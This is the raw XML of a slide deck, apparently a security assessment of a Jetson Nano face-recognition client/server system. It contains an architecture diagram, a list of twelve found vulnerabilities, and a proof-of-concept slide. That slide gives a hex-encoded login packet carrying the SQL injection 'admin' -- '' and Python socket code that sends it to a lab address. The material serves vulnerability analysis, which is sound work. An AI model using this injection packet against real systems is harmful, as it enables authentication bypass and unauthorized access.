          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8709711" y="5234803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New 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194;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973933" y="5234803"/>
            <a:ext cx="684076" cy="288032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Google Shape;195;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973933" y="5663551"/>
            <a:ext cx="684076" cy="269479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SzPts val="1200"/>
            </a:pPr>
            <a:endParaRPr sz="160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Google Shape;196;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8709710" y="5663551"/>
            <a:ext cx="27774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>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Modified</a:t>
            </a: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 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" name="Google Shape;197;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6298045" y="5168128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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Secure channel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7" name="Google Shape;199;p55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5803187" y="5343525"/>
            <a:ext cx="483731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202;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571501" y="400051"/>
            <a:ext cx="6282826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Jetson </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nano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9" name="Google Shape;203;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7281029" y="400051"/>
            <a:ext cx="4329945" cy="4472336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D8D8D8">
              <a:alpha val="49019"/>
            </a:srgbClr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 smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Client</a:t>
            </a:r>
            <a:endParaRPr sz="28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10" name="Google Shape;205;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1049100" y="3856949"/>
            <a:ext cx="1260000" cy="712633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DB</a:t>
            </a:r>
            <a:endParaRPr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Google Shape;206;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9598984" y="3219450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2" name="Google Shape;207;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9598984" y="1326298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Mode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Control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Google Shape;208;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4465835" y="2278165"/>
            <a:ext cx="163884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4" name="Google Shape;209;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472495" y="3219643"/>
            <a:ext cx="1630096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5" name="Google Shape;210;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2685407" y="227816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Service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6" name="Google Shape;211;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1049099" y="1322056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Display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7" name="Google Shape;212;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1049098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Face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Detection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Google Shape;213;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2685407" y="3219450"/>
            <a:ext cx="1474003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Data</a:t>
            </a:r>
            <a:endParaRPr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19" name="Google Shape;214;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4469165" y="1322056"/>
            <a:ext cx="1630094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0" name="Google Shape;215;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7635925" y="2278165"/>
            <a:ext cx="1639439" cy="565124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFC000"/>
              </a:gs>
              <a:gs pos="48000">
                <a:srgbClr val="FEFEFE"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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Communication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1" name="Google Shape;216;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7638525" y="1322160"/>
            <a:ext cx="1613686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Protocol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2" name="Google Shape;217;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7648420" y="3219450"/>
            <a:ext cx="1613687" cy="565124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000">
              <a:alpha val="49019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Authentication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23" name="Google Shape;218;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2685407" y="4003497"/>
            <a:ext cx="1474003" cy="56512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Security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24" name="Google Shape;220;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="19" idx="2"/>
            <a:endCxn id="13" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5284212" y="1887180"/>
            <a:ext cx="1048" cy="39098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5" name="Google Shape;221;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5285260" y="2843289"/>
            <a:ext cx="2283" cy="37635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6" name="Google Shape;222;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="2"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8445368" y="1887284"/>
            <a:ext cx="10277" cy="39088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7" name="Google Shape;223;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="2"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8455264" y="2843289"/>
            <a:ext cx="381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8" name="Google Shape;224;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="9275364" y="1608859"/>
            <a:ext cx="323620" cy="95186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9" name="Google Shape;225;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9275364" y="2560728"/>
            <a:ext cx="323620" cy="9412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" name="Google Shape;226;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="3"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159410" y="2560727"/>
            <a:ext cx="306425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1" name="Google Shape;227;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="0"/>
            <a:endCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3422409" y="2843289"/>
            <a:ext cx="0" cy="376161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2" name="Google Shape;228;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="23" idx="0"/>
            <a:endCxn id="18" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3422409" y="3784574"/>
            <a:ext cx="0" cy="21892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" name="Google Shape;229;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="3"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2204533" y="4270760"/>
            <a:ext cx="480874" cy="15299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" name="Google Shape;231;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="0"/>
            <a:endCxn id="16" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2635983" y="1491738"/>
            <a:ext cx="673547" cy="89930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" name="Google Shape;232;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="1"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1679101" y="3502011"/>
            <a:ext cx="1006307" cy="354937"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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6" name="Google Shape;230;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751689" y="4139975"/>
            <a:ext cx="452844" cy="2615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100" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>SDB</a:t>
            </a:r>
            <a:endParaRPr sz="1100"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37" name="Google Shape;234;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="16" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1786100" y="1887180"/>
            <a:ext cx="1" cy="386905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8" name="Google Shape;235;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="0"/>
            <a:endCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2414135" y="2211175"/>
            <a:ext cx="380241" cy="163630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9" name="Google Shape;236;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9596600" y="2274085"/>
            <a:ext cx="1474003" cy="5651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User </a:t>
            </a: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Input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Manager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40" name="Google Shape;237;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="3"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9275364" y="2556647"/>
            <a:ext cx="321236" cy="408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" name="Google Shape;238;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="3"/>
            <a:endCxn id="14" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159410" y="3502012"/>
            <a:ext cx="313085" cy="193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" name="Google Shape;219;p55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6725275" y="2754510"/>
            <a:ext cx="90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3" name="Google Shape;233;p55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6735429" y="2557052"/>
            <a:ext cx="90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4" name="Google Shape;214;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFFA0191-9961-4516-859A-604700977967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479194" y="2079730"/>
            <a:ext cx="258322" cy="1272844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000">
              <a:alpha val="49411"/>
            </a:srgbClr>
          </a:solidFill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eaVert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Firewall</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none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45" name="Google Shape;233;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08CF8F02-18B1-4A1B-8B92-8E56F353534D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6114151" y="2539471"/>
            <a:ext cx="360000" cy="756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6" name="Google Shape;219;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB8D6E94-6508-4EDE-9C03-75702AA75FDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6127440" y="2749307"/>
            <a:ext cx="360000" cy="1694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8F2D1BDA-23B8-4349-8984-BE1B4BD4CD68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5144551" y="108882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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{214527EA-3F5E-4A77-AA8B-A562C5B0F6C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537609" y="2079730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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD37F2FA-E8CD-47F0-B041-42281CBBD1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1960551" y="378530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SD6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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFCD2F96-5CAE-4D55-9CC1-0C2A73C51C9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321996" y="2025842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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C1EAE1-FF6A-457D-B34B-58B6205BD145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6366723" y="326355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SD8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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BF1A94-9942-40EE-9FC7-1FC2D6573A24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6935578" y="2251374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290C5C0B-6FF7-47DE-AA13-1D7BA72EEACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8486642" y="1067875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C88302A2-9351-4F02-B76E-00161A78BDBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8685990" y="2029687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AF6CE26B-897D-48B0-B910-084056A7C677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8442877" y="530996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SD9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2176C940-B3F5-4781-A426-FE55D18A29BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6417731" y="5488845"/>
            <a:ext cx="1020234" cy="605909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Security Design ID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9" name="Google Shape;218;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4482045" y="3997270"/>
            <a:ext cx="1656109" cy="565124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chemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Log</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0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0" name="Google Shape;194;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973933" y="6092299"/>
            <a:ext cx="684076" cy="288032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chemeClr val="bg1"/>
              </a:solidFill>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Google Shape;193;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8709710" y="6097835"/>
            <a:ext cx="221799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dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unspecified </a:t>
            </a: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Component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62" name="폭발 1 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302516" y="4352578"/>
            <a:ext cx="766103" cy="81118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V01V09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3" name="폭발 1 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336954" y="4304669"/>
            <a:ext cx="752315" cy="794666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4" name="폭발 1 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2408437" y="2946233"/>
            <a:ext cx="747330" cy="738437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V07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5" name="폭발 1 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3796920" y="1912577"/>
            <a:ext cx="1611236" cy="1518565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V04,V05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V08,V10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8" name="폭발 1 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5919355" y="6048710"/>
            <a:ext cx="460785" cy="474863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9" name="Google Shape;197;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6350326" y="6116885"/>
            <a:ext cx="167588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0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE5C7E7-6196-4919-9E26-F786109572D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834773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SD3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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1413D02F-4376-472C-B5B6-9D3FAE116D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321132" y="3668918"/>
            <a:ext cx="479394" cy="302955"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF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SD5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66" name="폭발 1 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6827098" y="2667632"/>
            <a:ext cx="770664" cy="75722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V02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67" name="폭발 1 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8418464" y="3626295"/>
            <a:ext cx="817455" cy="811188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V06</a:t>
            </a:r>
          </a:p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0" name="폭발 1 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4298872" y="3415034"/>
            <a:ext cx="753606" cy="770617"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1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V11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9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33332"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="414072" y="715990"/>
          <a:ext cx="11352362" cy="5502324"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="886432"/>
                <a:gridCol w="10465930"/>
              </a:tblGrid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Insert an arbitrary id/password to DB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Sniffing the id/password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V03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Exposed user credentials in the server log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V04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Infinite loop in the NetworkTCP.cpp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V05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Unintentional handling of the protocol message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V06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Weak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passwords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that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enable brute force attacks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V07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SQL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injection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for </a:t>
                      </a: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V08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Memory leakage in the '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="200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get_a_packet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 function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V09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Extraction of name and face image data used by the face </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" kern="100" dirty="0" err="1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recog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AI engine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V10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system cannot be operated on the big endian architectures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Possible MITM attack using certificate change</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="2000" kern="100"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Crash by unsigned</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" kern="1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integer wraparound related in the packet size</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" alt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14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11187"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="414072" y="715990"/>
          <a:ext cx="11352362" cy="5502324"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="886432"/>
                <a:gridCol w="10465930"/>
              </a:tblGrid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Insert an arbitrary id/password to DB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V02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Sniffing the id/password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V03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Exposed user credentials in the server log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V04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Infinite loop in the NetworkTCP.cpp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V05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Unintentional handling of the protocol message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V06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Weak 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passwords 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that </a:t>
                      </a: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enable brute force attacks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V07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SQL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injection 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for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V08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Memory leakage in the '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" kern="1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get_a_packet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' function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V09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Extraction of name and face image data used by the face </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" kern="1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recog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. AI engine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V10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system cannot be operated on the big endian architectures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V11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Possible MITM attack using certificate change</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="2000" kern="10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85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V12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Crash by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unsigned</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" kern="1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kern="1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integer wraparound </a:t>
                      </a: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related in the packet size</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR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216000" marR="21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76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V07 – SQL injection for login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[REVIEW/CODE]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[SQLINJECTION] [CRAFTPACKET]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36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46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Craft packet for SQL injection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\x53\x42\x31\x54\x21\x00\x00\x00\xC7\x8C\x07\x3C\xE8\x03\x00\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x0A\x0B\x61\x64\x6D\x69\x6E\x27\x20\x2D\x2D\x20\x27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>\x12\x02\x30\x30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>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\x0A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>x0B : id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>x61\x64\x6D\x69\x6E\x27\x20\x2D\x2D\x20\x27 :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admin’ -- ‘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pic>
        <p:nvPicPr>
          <p:cNvPr id="59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04706" y="5242560"/>
            <a:ext cx="744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dmin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Lessons learned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2   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Send the crafted packet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socket.socket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socket.AF_INET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socket.SOCK_STREAM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s.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>(('192.168.0.228', 50000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean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err="1" smtClean="0"/>
              <a:t>s.sendall</a:t>
            </a:r>
            <a:r>
